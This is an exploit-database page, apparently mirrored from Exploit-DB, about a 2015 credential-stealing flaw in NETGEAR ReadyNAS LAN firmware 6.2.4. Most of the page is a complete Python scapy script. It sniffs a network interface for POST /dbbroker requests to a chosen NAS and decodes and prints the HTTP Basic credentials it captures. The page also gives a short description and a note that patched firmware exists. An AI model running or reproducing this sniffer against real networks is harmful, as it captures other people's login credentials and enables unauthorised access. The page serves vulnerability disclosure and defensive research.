header-logo
Suggest Exploit
vendor:
ReadyNAS LAN
by:
St0rn
7.5
CVSS
HIGH
Credential Stealing
522
CWE
Product Name: ReadyNAS LAN
Affected Version From: Firmware 6.2.4
Affected Version To: Firmware 6.2.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

NETGEAR ReadyNAS LAN /dbbroker Credential Stealing

NETGEAR ReadyNAS LAN /dbbroker Credential Stealing is a vulnerability that allows an attacker to steal credentials from a NETGEAR ReadyNAS LAN device. The exploit uses scapy to sniff the network traffic and extract the credentials from the POST request sent to the dbbroker. The credentials are then decoded from base64 and printed to the screen.

Mitigation:

Users should ensure that their NETGEAR ReadyNAS LAN devices are running the latest firmware version and that all security patches are applied.
Source

Exploit-DB raw data:

#!/usr/bin/env python
#
# Exploit Title: NETGEAR ReadyNAS LAN /dbbroker Credential Stealing
# Date: 25/07/2015
# Exploit Author: St0rn
# Vendor Homepage: www.netgear.fr/business/products/storage/readynas
# Software Link: apps.readynas.com/pages/?page_id=143
# Version: Firmware 6.2.4
#

### Import ###
from scapy.all import *
from sys import argv,exit
from os import system

### Clear Function ###
def clear():
system("/usr/bin/clear")


### Function to get and decode credential ###
def getReadyNASCredz(p):
if p.haslayer(TCP) and p[IP].dst==argv[2]:
if p.haslayer(Raw):
if "POST /dbbroker" in p[Raw].load:
tmp=p[Raw].load
credz=tmp.split("\r\n")
for i in credz:
if "Authorization: Basic" in i:
print "-----------------".center(80)
print i.split(" ")[2].decode("base64").center(80)


### Main ###
if __name__ == '__main__':

clear()
if len(argv)<3:
print "Usage: %s [device] [NAS_IP]" %(argv[0])
exit(0)
else:
print "\n"
print "#################".center(80)
print "#G0 t0 G3t Cr3dZ#".center(80)
print "#################\n".center(80)

sniff(prn=getReadyNASCredz,iface=argv[1])

Navigation

Suggest Exploit

Services By CQR